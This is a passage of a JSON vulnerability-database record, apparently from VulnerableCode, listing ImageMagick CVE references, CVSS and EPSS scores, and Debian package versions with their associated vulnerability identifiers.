"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1707768", "reference_id": "1707768", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1707768" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927828", "reference_id": "927828", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927828" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-11472" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jqv2-v42r-7ybf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82473?format=api", "vulnerability_id": "VCID-kfb4-xnqr-cya6", "summary": "ImageMagick: a memory leak vulnerability in the function ReadPSImage in coders/ps.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13137.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13137.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01489", "scoring_system": "epss", "scoring_elements": "0.81108", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.01489", "scoring_system": "epss", "scoring_elements": "0.81088", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.01489", "scoring_system": "epss", "scoring_elements": "0.81089", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.01489", "scoring_system": "epss", "scoring_elements": "0.81086", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81206", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81239", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81259", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81245", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81238", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81174", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81234", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.01518", "scoring_system": "epss", "scoring_elements": "0.81182", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", 